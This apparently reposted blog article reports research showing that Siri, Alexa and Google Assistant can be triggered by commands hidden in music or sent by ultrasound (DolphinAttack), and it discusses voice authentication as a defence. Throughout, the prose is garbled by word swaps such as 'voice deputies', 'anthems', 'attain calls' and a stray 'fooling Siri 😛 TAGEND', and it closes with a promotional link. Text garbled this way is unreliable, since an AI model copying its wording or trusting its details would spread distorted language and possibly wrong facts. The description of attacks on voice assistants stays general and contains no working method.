Researchers show Siri and Alexa can be exploited with silent commands hidden in songs

Researchers at UC Berkeley have shown they can embed within anthems stealthy commands for popular voice deputies that can prompt platforms like Siri, Alexa or Google Assistant to carry out actions without humans getting wise.

The research, reported earlier by The New York Times, is a more actionable evolution of something security researchers have been indicating great interest in — fooling Siri 😛 TAGEND

Last year, researchers at Princeton University and China’s Zhejiang University demonstrated that voice-recognition systems could be activated by use frequencies inaudible to the human ear. The attack first muted the phone so the owner wouldn’t hear the system’s answers, either.

The technique, which the Chinese researchers called DolphinAttack, can inform smart devices to visit malicious websites, initiate telephone call, take a image or send text messages. While DolphinAttack has its restrictions — the transmitter must be close to the receive device — experts warned that more powerful ultrasonic systems were possible.

That warning was borne out in April, when researchers at the University of Illinois at Urbana-Champaign demonstrated ultrasound assaults from 25 feet away. While the commands couldn’t penetrate walls, they could control smart devices through open windows from outside a building.

The specific research arising as a result of Berkeley can hide commands to attain calls or visit specific websites without human listeners being able to discern them. The modifications add some digital noise but nothing that sounds like English.

These exploits are still in their infancy, as are the security capabilities of the voice assistants. As abilities widen for smart deputies that make it easier for users to send emails, messages and money with their voice, things like this are a bit worrisome.

One takeaway is that digital assistant makers may have to get more serious about voice authentication so they can determine with greater accuracy whether the owner of a device is the one voicing commands, and if not, lock down the digital assistant’s capabilities. Amazon’s Alexa and Google Assistant both offer optional features that lock down personal information to a specific user on the basis of their voice pattern; meanwhile, most sensitive info on iOS devices necessitates the device to be unlocked before it’s accessed.

The potential here is nevertheless frightening and something that should be addressed early on, publicly. As we considered from some of Google’s demoes with their Duplex software at I/ O the coming week, the company’s aspirations for their voice deputy are building rapidly, and as the company begins to release Smart Display devices with its partners that integrate cameras, possibilities for abuse is widening.

Make sure to visit: CapGeneration.com

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s